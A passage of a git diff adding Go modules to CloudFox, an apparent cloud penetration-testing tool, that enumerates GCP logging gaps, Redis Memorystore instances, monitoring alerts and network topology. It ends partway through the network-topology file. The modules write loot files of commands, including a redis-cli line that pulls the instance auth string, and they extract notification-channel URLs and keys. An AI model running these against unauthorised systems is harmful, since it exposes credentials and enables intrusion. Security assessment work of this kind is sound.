+func (m *LoggingGapsModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_LOGGINGGAPS_MODULE_NAME, m.processProject) + + if len(m.Gaps) == 0 { + logger.InfoM("No logging gaps found", globals.GCP_LOGGINGGAPS_MODULE_NAME) + return + } + + logger.SuccessM(fmt.Sprintf("Found %d logging gap(s)", len(m.Gaps)), globals.GCP_LOGGINGGAPS_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *LoggingGapsModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Scanning logging gaps in project: %s", projectID), globals.GCP_LOGGINGGAPS_MODULE_NAME) + } + + svc := logginggapsservice.New() + gaps, auditConfig, err := svc.EnumerateLoggingGaps(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_LOGGINGGAPS_MODULE_NAME, + fmt.Sprintf("Could not enumerate logging gaps in project %s", projectID)) + return + } + + m.mu.Lock() + m.Gaps = append(m.Gaps, gaps...) + if auditConfig != nil { + m.AuditConfigs = append(m.AuditConfigs, auditConfig) + } + + for _, gap := range gaps { + m.addGapToLoot(gap) + } + m.mu.Unlock() + + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Found %d logging gap(s) in project %s", len(gaps), projectID), globals.GCP_LOGGINGGAPS_MODULE_NAME) + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *LoggingGapsModule) initializeLootFiles() { + m.LootMap["logging-gaps-commands"] = &internal.LootFile{ + Name: "logging-gaps-commands", + Contents: "# Logging Gaps Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } +} + +func (m *LoggingGapsModule) addGapToLoot(gap logginggapsservice.LoggingGap) { + m.LootMap["logging-gaps-commands"].Contents += fmt.Sprintf( + "## %s: %s (Project: %s, Location: %s)\n"+ + "# Status: %s\n"+ + "# Missing:\n", + gap.ResourceType, gap.ResourceName, + gap.ProjectID, gap.Location, + gap.LoggingStatus, + ) + for _, missing := range gap.MissingLogs { + m.LootMap["logging-gaps-commands"].Contents += fmt.Sprintf("# - %s\n", missing) + } + m.LootMap["logging-gaps-commands"].Contents += "\n" + + // Add exploit commands + if len(gap.ExploitCommands) > 0 { + for _, cmd := range gap.ExploitCommands { + m.LootMap["logging-gaps-commands"].Contents += cmd + "\n" + } + m.LootMap["logging-gaps-commands"].Contents += "\n" + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *LoggingGapsModule) writeOutput(ctx context.Context, logger internal.Logger) { + header := []string{ + "Project ID", + "Project Name", + "Type", + "Resource", + "Location", + "Status", + "Missing Logs", + } + + var body [][]string + for _, gap := range m.Gaps { + missingLogs := strings.Join(gap.MissingLogs, "; ") + + location := gap.Location + if location == "" { + location = "-" + } + + body = append(body, []string{ + gap.ProjectID, + m.GetProjectName(gap.ProjectID), + gap.ResourceType, + gap.ResourceName, + location, + gap.LoggingStatus, + missingLogs, + }) + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + tables := []internal.TableFile{ + { + Name: "logging-gaps", + Header: header, + Body: body, + }, + } + + output := LoggingGapsOutput{ + Table: tables, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_LOGGINGGAPS_MODULE_NAME) + m.CommandCounter.Error++ + } +} diff --git a/gcp/commands/memorystore.go b/gcp/commands/memorystore.go new file mode 100644 index 00000000..6defdb06 --- /dev/null +++ b/gcp/commands/memorystore.go @@ -0,0 +1,224 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + memorystoreservice "github.com/BishopFox/cloudfox/gcp/services/memorystoreService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" +) + +var GCPMemorystoreCommand = &cobra.Command{ + Use: globals.GCP_MEMORYSTORE_MODULE_NAME, + Aliases: []string{"redis", "cache"}, + Short: "Enumerate Memorystore (Redis) instances", + Long: `Enumerate Memorystore for Redis instances with security analysis. + +Features: +- Lists all Redis instances +- Shows authentication and encryption status +- Identifies network configuration +- Detects security misconfigurations`, + Run: runGCPMemorystoreCommand, +} + +type MemorystoreModule struct { + gcpinternal.BaseGCPModule + RedisInstances []memorystoreservice.RedisInstanceInfo + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +type MemorystoreOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o MemorystoreOutput) TableFiles() []internal.TableFile { return o.Table } +func (o MemorystoreOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPMemorystoreCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, globals.GCP_MEMORYSTORE_MODULE_NAME) + if err != nil { + return + } + + module := &MemorystoreModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + RedisInstances: []memorystoreservice.RedisInstanceInfo{}, + LootMap: make(map[string]*internal.LootFile), + } + + module.initializeLootFiles() + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *MemorystoreModule) Execute(ctx context.Context, logger internal.Logger) { + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_MEMORYSTORE_MODULE_NAME, m.processProject) + + if len(m.RedisInstances) == 0 { + logger.InfoM("No Memorystore instances found", globals.GCP_MEMORYSTORE_MODULE_NAME) + return + } + + noAuth := 0 + for _, instance := range m.RedisInstances { + if !instance.AuthEnabled { + noAuth++ + } + } + + logger.SuccessM(fmt.Sprintf("Found %d Redis instance(s) (%d without auth)", + len(m.RedisInstances), noAuth), globals.GCP_MEMORYSTORE_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +func (m *MemorystoreModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating Memorystore in project: %s", projectID), globals.GCP_MEMORYSTORE_MODULE_NAME) + } + + svc := memorystoreservice.New() + instances, err := svc.ListRedisInstances(projectID) + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, globals.GCP_MEMORYSTORE_MODULE_NAME, + fmt.Sprintf("Could not list Redis instances in project %s", projectID)) + return + } + + m.mu.Lock() + m.RedisInstances = append(m.RedisInstances, instances...) + for _, instance := range instances { + m.addInstanceToLoot(instance) + } + m.mu.Unlock() +} + +func (m *MemorystoreModule) initializeLootFiles() { + m.LootMap["memorystore-commands"] = &internal.LootFile{ + Name: "memorystore-commands", + Contents: "# Memorystore Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } +} + +func (m *MemorystoreModule) addInstanceToLoot(instance memorystoreservice.RedisInstanceInfo) { + m.LootMap["memorystore-commands"].Contents += fmt.Sprintf( + "## Instance: %s (Project: %s, Location: %s)\n"+ + "# Host: %s:%d\n"+ + "# Auth: %v, Encryption: %s\n\n", + instance.Name, instance.ProjectID, instance.Location, + instance.Host, instance.Port, + instance.AuthEnabled, instance.TransitEncryption, + ) + + // gcloud commands + m.LootMap["memorystore-commands"].Contents += fmt.Sprintf( + "# Describe instance:\n"+ + "gcloud redis instances describe %s --region=%s --project=%s\n\n", + instance.Name, instance.Location, instance.ProjectID, + ) + + // Auth string command (if auth enabled) + if instance.AuthEnabled { + m.LootMap["memorystore-commands"].Contents += fmt.Sprintf( + "# Get auth string:\n"+ + "gcloud redis instances get-auth-string %s --region=%s --project=%s\n\n", + instance.Name, instance.Location, instance.ProjectID, + ) + } + + // Redis CLI connection command + authStr := "" + if instance.AuthEnabled { + authStr = " -a $(gcloud redis instances get-auth-string " + instance.Name + + " --region=" + instance.Location + " --project=" + instance.ProjectID + + " --format='value(authString)')" + } + m.LootMap["memorystore-commands"].Contents += fmt.Sprintf( + "# Connect to Redis (from a VM in the same VPC):\n"+ + "redis-cli -h %s -p %d%s\n\n", + instance.Host, instance.Port, authStr, + ) +} + +// extractNetworkName extracts the network name from the full resource path +func extractNetworkName(network string) string { + if network == "" { + return "-" + } + parts := strings.Split(network, "/") + if len(parts) > 0 { + return parts[len(parts)-1] + } + return network +} + +func (m *MemorystoreModule) writeOutput(ctx context.Context, logger internal.Logger) { + header := []string{ + "Project Name", + "Project ID", + "Name", + "Location", + "Tier", + "Memory (GB)", + "Version", + "Host:Port", + "Auth Enabled", + "Transit Encryption", + "State", + "Network", + "Connect Mode", + } + + var body [][]string + for _, instance := range m.RedisInstances { + transitEncryption := instance.TransitEncryption + if transitEncryption == "" { + transitEncryption = "DISABLED" + } + body = append(body, []string{ + m.GetProjectName(instance.ProjectID), + instance.ProjectID, + instance.Name, + instance.Location, + instance.Tier, + fmt.Sprintf("%d", instance.MemorySizeGB), + instance.RedisVersion, + fmt.Sprintf("%s:%d", instance.Host, instance.Port), + boolToYesNo(instance.AuthEnabled), + transitEncryption, + instance.State, + extractNetworkName(instance.AuthorizedNetwork), + instance.ConnectMode, + }) + } + + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + tables := []internal.TableFile{{Name: "memorystore", Header: header, Body: body}} + + output := MemorystoreOutput{Table: tables, Loot: lootFiles} + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, + "project", m.ProjectIDs, scopeNames, m.Account, output) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_MEMORYSTORE_MODULE_NAME) + } +} diff --git a/gcp/commands/monitoringalerts.go b/gcp/commands/monitoringalerts.go new file mode 100644 index 00000000..22206e00 --- /dev/null +++ b/gcp/commands/monitoringalerts.go @@ -0,0 +1,761 @@ +package commands + +import ( + "context" + "fmt" + "sort" + "strings" + "sync" + + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" + + monitoring "cloud.google.com/go/monitoring/apiv3/v2" + "cloud.google.com/go/monitoring/apiv3/v2/monitoringpb" + "google.golang.org/api/iterator" +) + +// Module name constant +const GCP_MONITORINGALERTS_MODULE_NAME string = "monitoring-alerts" + +var GCPMonitoringAlertsCommand = &cobra.Command{ + Use: GCP_MONITORINGALERTS_MODULE_NAME, + Aliases: []string{"alerts", "monitoring", "alerting"}, + Hidden: true, + Short: "Enumerate Cloud Monitoring alerting policies and notification channels", + Long: `Analyze Cloud Monitoring alerting policies and notification channels for security gaps. + +Features: +- Lists all alerting policies and their conditions +- Identifies disabled or misconfigured alerts +- Enumerates notification channels and their verification status +- Detects missing critical security alerts +- Identifies uptime check configurations +- Analyzes alert policy coverage gaps + +Required Security Alerts to Check: +- IAM policy changes +- Firewall rule changes +- VPC network changes +- Service account key creation +- Custom role changes +- Audit log configuration changes +- Cloud SQL authorization changes + +Requires appropriate IAM permissions: +- roles/monitoring.viewer +- roles/monitoring.alertPolicyViewer`, + Run: runGCPMonitoringAlertsCommand, +} + +// ------------------------------ +// Data Structures +// ------------------------------ + +type AlertPolicy struct { + Name string + DisplayName string + ProjectID string + Enabled bool + Combiner string + Documentation string + Conditions []AlertCondition + NotificationChannels []string // Channel resource names +} + +type AlertCondition struct { + Name string + DisplayName string + ResourceType string + MetricType string + Filter string + ThresholdValue float64 + Duration string + Comparison string + Aggregation string +} + +type NotificationChannel struct { + Name string + DisplayName string + ProjectID string + Type string // email, slack, pagerduty, webhook, sms, pubsub + Enabled bool + Verified bool + Labels map[string]string + CreationTime string + MutationTime string +} + +type UptimeCheck struct { + Name string + DisplayName string + ProjectID string + MonitoredHost string + ResourceType string + Protocol string + Port int32 + Path string + Period string + Timeout string + SelectedRegion []string + Enabled bool + SSLEnabled bool +} + + +// ------------------------------ +// Module Struct +// ------------------------------ +type MonitoringAlertsModule struct { + gcpinternal.BaseGCPModule + + AlertPolicies []AlertPolicy + NotificationChannels []NotificationChannel + UptimeChecks []UptimeCheck + LootMap map[string]*internal.LootFile + mu sync.Mutex +} + +// ------------------------------ +// Output Struct +// ------------------------------ +type MonitoringAlertsOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o MonitoringAlertsOutput) TableFiles() []internal.TableFile { return o.Table } +func (o MonitoringAlertsOutput) LootFiles() []internal.LootFile { return o.Loot } + +// ------------------------------ +// Command Entry Point +// ------------------------------ +func runGCPMonitoringAlertsCommand(cmd *cobra.Command, args []string) { + // Initialize command context + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, GCP_MONITORINGALERTS_MODULE_NAME) + if err != nil { + return + } + + // Create module instance + module := &MonitoringAlertsModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + AlertPolicies: []AlertPolicy{}, + NotificationChannels: []NotificationChannel{}, + UptimeChecks: []UptimeCheck{}, + LootMap: make(map[string]*internal.LootFile), + } + + // Initialize loot files + module.initializeLootFiles() + + // Execute enumeration + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +// ------------------------------ +// Module Execution +// ------------------------------ +func (m *MonitoringAlertsModule) Execute(ctx context.Context, logger internal.Logger) { + // Create Monitoring client + alertClient, err := monitoring.NewAlertPolicyClient(ctx) + if err != nil { + logger.ErrorM(fmt.Sprintf("Failed to create Alert Policy client: %v", err), GCP_MONITORINGALERTS_MODULE_NAME) + return + } + defer alertClient.Close() + + channelClient, err := monitoring.NewNotificationChannelClient(ctx) + if err != nil { + logger.ErrorM(fmt.Sprintf("Failed to create Notification Channel client: %v", err), GCP_MONITORINGALERTS_MODULE_NAME) + return + } + defer channelClient.Close() + + uptimeClient, err := monitoring.NewUptimeCheckClient(ctx) + if err != nil { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.ErrorM(fmt.Sprintf("Failed to create Uptime Check client: %v", err), GCP_MONITORINGALERTS_MODULE_NAME) + } + } + if uptimeClient != nil { + defer uptimeClient.Close() + } + + // Process each project + for _, projectID := range m.ProjectIDs { + m.processProject(ctx, projectID, alertClient, channelClient, uptimeClient, logger) + } + + // Check results + if len(m.AlertPolicies) == 0 && len(m.NotificationChannels) == 0 { + logger.InfoM("No monitoring alerts or notification channels found", GCP_MONITORINGALERTS_MODULE_NAME) + return + } + + logger.SuccessM(fmt.Sprintf("Found %d alert policy(ies), %d notification channel(s), %d uptime check(s)", + len(m.AlertPolicies), len(m.NotificationChannels), len(m.UptimeChecks)), GCP_MONITORINGALERTS_MODULE_NAME) + + m.writeOutput(ctx, logger) +} + +// ------------------------------ +// Project Processor +// ------------------------------ +func (m *MonitoringAlertsModule) processProject(ctx context.Context, projectID string, alertClient *monitoring.AlertPolicyClient, channelClient *monitoring.NotificationChannelClient, uptimeClient *monitoring.UptimeCheckClient, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating monitoring for project: %s", projectID), GCP_MONITORINGALERTS_MODULE_NAME) + } + + // List alert policies + m.enumerateAlertPolicies(ctx, projectID, alertClient, logger) + + // List notification channels + m.enumerateNotificationChannels(ctx, projectID, channelClient, logger) + + // List uptime checks + if uptimeClient != nil { + m.enumerateUptimeChecks(ctx, projectID, uptimeClient, logger) + } +} + +func (m *MonitoringAlertsModule) enumerateAlertPolicies(ctx context.Context, projectID string, client *monitoring.AlertPolicyClient, logger internal.Logger) { + parent := fmt.Sprintf("projects/%s", projectID) + + req := &monitoringpb.ListAlertPoliciesRequest{ + Name: parent, + } + + it := client.ListAlertPolicies(ctx, req) + for { + policy, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_MONITORINGALERTS_MODULE_NAME, + fmt.Sprintf("Could not enumerate alert policies in project %s", projectID)) + break + } + + alertPolicy := AlertPolicy{ + Name: policy.Name, + DisplayName: policy.DisplayName, + ProjectID: projectID, + Enabled: policy.Enabled.GetValue(), + Combiner: policy.Combiner.String(), + NotificationChannels: policy.NotificationChannels, + } + + if policy.Documentation != nil { + alertPolicy.Documentation = policy.Documentation.Content + } + + // Parse conditions + for _, cond := range policy.Conditions { + condition := AlertCondition{ + Name: cond.Name, + DisplayName: cond.DisplayName, + } + + // Parse based on condition type + switch c := cond.Condition.(type) { + case *monitoringpb.AlertPolicy_Condition_ConditionThreshold: + if c.ConditionThreshold != nil { + condition.Filter = c.ConditionThreshold.Filter + condition.Comparison = c.ConditionThreshold.Comparison.String() + condition.ThresholdValue = c.ConditionThreshold.ThresholdValue + + if c.ConditionThreshold.Duration != nil { + condition.Duration = c.ConditionThreshold.Duration.String() + } + + condition.MetricType = m.extractMetricType(c.ConditionThreshold.Filter) + } + case *monitoringpb.AlertPolicy_Condition_ConditionAbsent: + if c.ConditionAbsent != nil { + condition.Filter = c.ConditionAbsent.Filter + condition.MetricType = m.extractMetricType(c.ConditionAbsent.Filter) + } + case *monitoringpb.AlertPolicy_Condition_ConditionMonitoringQueryLanguage: + if c.ConditionMonitoringQueryLanguage != nil { + condition.Filter = c.ConditionMonitoringQueryLanguage.Query + } + } + + alertPolicy.Conditions = append(alertPolicy.Conditions, condition) + } + + m.mu.Lock() + m.AlertPolicies = append(m.AlertPolicies, alertPolicy) + m.mu.Unlock() + } +} + +func (m *MonitoringAlertsModule) enumerateNotificationChannels(ctx context.Context, projectID string, client *monitoring.NotificationChannelClient, logger internal.Logger) { + parent := fmt.Sprintf("projects/%s", projectID) + + req := &monitoringpb.ListNotificationChannelsRequest{ + Name: parent, + } + + it := client.ListNotificationChannels(ctx, req) + for { + channel, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_MONITORINGALERTS_MODULE_NAME, + fmt.Sprintf("Could not enumerate notification channels in project %s", projectID)) + break + } + + notifChannel := NotificationChannel{ + Name: channel.Name, + DisplayName: channel.DisplayName, + ProjectID: projectID, + Type: channel.Type, + Enabled: channel.Enabled.GetValue(), + Labels: channel.Labels, + } + + // Check verification status + if channel.VerificationStatus == monitoringpb.NotificationChannel_VERIFIED { + notifChannel.Verified = true + } + + if channel.CreationRecord != nil { + notifChannel.CreationTime = channel.CreationRecord.MutateTime.AsTime().String() + } + + // MutationRecords is a slice - get the most recent one + if len(channel.MutationRecords) > 0 { + lastMutation := channel.MutationRecords[len(channel.MutationRecords)-1] + if lastMutation != nil { + notifChannel.MutationTime = lastMutation.MutateTime.AsTime().String() + } + } + + m.mu.Lock() + m.NotificationChannels = append(m.NotificationChannels, notifChannel) + m.mu.Unlock() + } +} + +func (m *MonitoringAlertsModule) enumerateUptimeChecks(ctx context.Context, projectID string, client *monitoring.UptimeCheckClient, logger internal.Logger) { + parent := fmt.Sprintf("projects/%s", projectID) + + req := &monitoringpb.ListUptimeCheckConfigsRequest{ + Parent: parent, + } + + it := client.ListUptimeCheckConfigs(ctx, req) + for { + check, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + m.CommandCounter.Error++ + gcpinternal.HandleGCPError(err, logger, GCP_MONITORINGALERTS_MODULE_NAME, + fmt.Sprintf("Could not enumerate uptime checks in project %s", projectID)) + break + } + + uptimeCheck := UptimeCheck{ + Name: check.Name, + DisplayName: check.DisplayName, + ProjectID: projectID, + } + + // Parse resource type + switch r := check.Resource.(type) { + case *monitoringpb.UptimeCheckConfig_MonitoredResource: + if r.MonitoredResource != nil { + uptimeCheck.ResourceType = r.MonitoredResource.Type + if host, ok := r.MonitoredResource.Labels["host"]; ok { + uptimeCheck.MonitoredHost = host + } + } + } + + // Parse check request details + switch cr := check.CheckRequestType.(type) { + case *monitoringpb.UptimeCheckConfig_HttpCheck_: + if cr.HttpCheck != nil { + uptimeCheck.Protocol = "HTTP" + uptimeCheck.Port = cr.HttpCheck.Port + uptimeCheck.Path = cr.HttpCheck.Path + if cr.HttpCheck.UseSsl { + uptimeCheck.Protocol = "HTTPS" + uptimeCheck.SSLEnabled = true + } + } + case *monitoringpb.UptimeCheckConfig_TcpCheck_: + if cr.TcpCheck != nil { + uptimeCheck.Protocol = "TCP" + uptimeCheck.Port = cr.TcpCheck.Port + } + } + + if check.Period != nil { + uptimeCheck.Period = check.Period.String() + } + + if check.Timeout != nil { + uptimeCheck.Timeout = check.Timeout.String() + } + + // Check regions + for _, region := range check.SelectedRegions { + uptimeCheck.SelectedRegion = append(uptimeCheck.SelectedRegion, region.String()) + } + + m.mu.Lock() + m.UptimeChecks = append(m.UptimeChecks, uptimeCheck) + m.mu.Unlock() + } +} + + +// ------------------------------ +// Helper Functions +// ------------------------------ +func (m *MonitoringAlertsModule) extractMetricType(filter string) string { + // Extract metric type from filter string + // Format: metric.type="..." or resource.type="..." + if strings.Contains(filter, "metric.type=") { + parts := strings.Split(filter, "metric.type=") + if len(parts) > 1 { + metricPart := strings.Split(parts[1], " ")[0] + return strings.Trim(metricPart, "\"") + } + } + return "" +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *MonitoringAlertsModule) initializeLootFiles() { + m.LootMap["monitoring-alerts-commands"] = &internal.LootFile{ + Name: "monitoring-alerts-commands", + Contents: "# Monitoring Alerts Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *MonitoringAlertsModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Build notification channel name map for resolving channel references + channelNameMap := make(map[string]string) + for _, c := range m.NotificationChannels { + channelNameMap[c.Name] = c.DisplayName + } + + // Sort policies by name + sort.Slice(m.AlertPolicies, func(i, j int) bool { + return m.AlertPolicies[i].DisplayName < m.AlertPolicies[j].DisplayName + }) + + // Alert Policies table - one row per condition + policiesHeader := []string{ + "Project Name", + "Project ID", + "Policy Name", + "Enabled", + "Condition Name", + "Metric Type", + "Comparison", + "Threshold", + "Duration", + "Notification Channels", + } + + var policiesBody [][]string + for _, p := range m.AlertPolicies { + // Resolve notification channel names + var channelNames []string + for _, channelRef := range p.NotificationChannels { + if name, ok := channelNameMap[channelRef]; ok { + channelNames = append(channelNames, name) + } else { + // Extract name from resource path if not found + parts := strings.Split(channelRef, "/") + if len(parts) > 0 { + channelNames = append(channelNames, parts[len(parts)-1]) + } + } + } + notificationChannelsStr := "-" + if len(channelNames) > 0 { + notificationChannelsStr = strings.Join(channelNames, ", ") + } + + // If policy has conditions, create one row per condition + if len(p.Conditions) > 0 { + for _, cond := range p.Conditions { + metricType := cond.MetricType + if metricType == "" { + metricType = "-" + } + comparison := cond.Comparison + if comparison == "" { + comparison = "-" + } + threshold := "-" + if cond.ThresholdValue != 0 { + threshold = fmt.Sprintf("%.2f", cond.ThresholdValue) + } + duration := cond.Duration + if duration == "" { + duration = "-" + } + + policiesBody = append(policiesBody, []string{ + m.GetProjectName(p.ProjectID), + p.ProjectID, + p.DisplayName, + boolToYesNo(p.Enabled), + cond.DisplayName, + metricType, + comparison, + threshold, + duration, + notificationChannelsStr, + }) + } + } else { + // Policy with no conditions - single row + policiesBody = append(policiesBody, []string{ + m.GetProjectName(p.ProjectID), + p.ProjectID, + p.DisplayName, + boolToYesNo(p.Enabled), + "-", + "-", + "-", + "-", + "-", + notificationChannelsStr, + }) + } + + // Add to loot + m.LootMap["monitoring-alerts-commands"].Contents += fmt.Sprintf( + "## Policy: %s (Project: %s)\n"+ + "# Describe alert policy:\n"+ + "gcloud alpha monitoring policies describe %s --project=%s\n\n", + p.DisplayName, p.ProjectID, + extractResourceName(p.Name), p.ProjectID, + ) + } + + // Notification Channels table - with destination info + channelsHeader := []string{ + "Project Name", + "Project ID", + "Channel Name", + "Type", + "Enabled", + "Verified", + "Destination", + } + + var channelsBody [][]string + for _, c := range m.NotificationChannels { + // Extract destination from labels based on type + destination := extractChannelDestination(c.Type, c.Labels) + + channelsBody = append(channelsBody, []string{ + m.GetProjectName(c.ProjectID), + c.ProjectID, + c.DisplayName, + c.Type, + boolToYesNo(c.Enabled), + boolToYesNo(c.Verified), + destination, + }) + + // Add to loot + m.LootMap["monitoring-alerts-commands"].Contents += fmt.Sprintf( + "## Channel: %s (Project: %s)\n"+ + "# Describe notification channel:\n"+ + "gcloud alpha monitoring channels describe %s --project=%s\n\n", + c.DisplayName, c.ProjectID, + extractResourceName(c.Name), c.ProjectID, + ) + } + + // Uptime Checks table - expanded + uptimeHeader := []string{ + "Project Name", + "Project ID", + "Check Name", + "Enabled", + "Host", + "Protocol", + "Port", + "Path", + "Period", + "Timeout", + "SSL Enabled", + } + + var uptimeBody [][]string + for _, u := range m.UptimeChecks { + host := u.MonitoredHost + if host == "" { + host = "-" + } + path := u.Path + if path == "" { + path = "-" + } + timeout := u.Timeout + if timeout == "" { + timeout = "-" + } + + uptimeBody = append(uptimeBody, []string{ + m.GetProjectName(u.ProjectID), + u.ProjectID, + u.DisplayName, + boolToYesNo(u.Enabled), + host, + u.Protocol, + fmt.Sprintf("%d", u.Port), + path, + u.Period, + timeout, + boolToYesNo(u.SSLEnabled), + }) + + // Add to loot + m.LootMap["monitoring-alerts-commands"].Contents += fmt.Sprintf( + "## Uptime Check: %s (Project: %s)\n"+ + "# Describe uptime check:\n"+ + "gcloud alpha monitoring uptime describe %s --project=%s\n\n", + u.DisplayName, u.ProjectID, + extractResourceName(u.Name), u.ProjectID, + ) + } + + // Collect loot files + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + + // Build tables + var tables []internal.TableFile + + if len(policiesBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "alerting-policies", + Header: policiesHeader, + Body: policiesBody, + }) + } + + if len(channelsBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "notification-channels", + Header: channelsHeader, + Body: channelsBody, + }) + } + + if len(uptimeBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "uptime-checks", + Header: uptimeHeader, + Body: uptimeBody, + }) + } + + output := MonitoringAlertsOutput{ + Table: tables, + Loot: lootFiles, + } + + // Build scope names using project names + scopeNames := make([]string, len(m.ProjectIDs)) + for i, projectID := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(projectID) + } + + // Write output + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), GCP_MONITORINGALERTS_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// extractChannelDestination extracts the destination info from channel labels +func extractChannelDestination(channelType string, labels map[string]string) string { + if labels == nil { + return "-" + } + + switch channelType { + case "email": + if email, ok := labels["email_address"]; ok { + return email + } + case "slack": + if channel, ok := labels["channel_name"]; ok { + return channel + } + case "pagerduty": + if key, ok := labels["service_key"]; ok { + // Truncate service key for display + if len(key) > 12 { + return key[:12] + "..." + } + return key + } + case "webhook_tokenauth", "webhook_basicauth": + if url, ok := labels["url"]; ok { + return url + } + case "pubsub": + if topic, ok := labels["topic"]; ok { + return topic + } + case "sms": + if number, ok := labels["number"]; ok { + return number + } + } + + // Try common label keys + for _, key := range []string{"url", "address", "endpoint", "target"} { + if val, ok := labels[key]; ok { + return val + } + } + + return "-" +} diff --git a/gcp/commands/networktopology.go b/gcp/commands/networktopology.go new file mode 100644 index 00000000..dd28c62c --- /dev/null +++ b/gcp/commands/networktopology.go @@ -0,0 +1,869 @@ +package commands + +import ( + "context" + "fmt" + "sort" + "strings" + "sync" + + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" + + "google.golang.org/api/compute/v1" +) + +// Module name constant +const GCP_NETWORKTOPOLOGY_MODULE_NAME string = "network-topology" + +var GCPNetworkTopologyCommand = &cobra.Command{ + Use: GCP_NETWORKTOPOLOGY_MODULE_NAME, + Aliases: []string{"topology", "network-map", "vpc-topology"}, + Short: "Visualize VPC network topology, peering relationships, and trust boundaries", + Long: `Analyze and visualize VPC network topology, peering relationships, and trust boundaries. + +Features: +- Maps all VPC networks and their subnets +- Identifies VPC peering relationships +- Detects Shared VPC configurations +- Analyzes VPC Service Controls perimeters +- Maps Cloud NAT and Private Google Access +- Identifies potential trust boundary issues +- Detects cross-project network access paths + +Requires appropriate IAM permissions: +- roles/compute.networkViewer +- roles/compute.viewer`, + Run: runGCPNetworkTopologyCommand, +} + +// ------------------------------ +// Data Structures +// ------------------------------ + +type VPCNetwork struct { + Name string + ProjectID string + SelfLink string + Description string + RoutingMode string + AutoCreateSubnets bool + SubnetCount int + 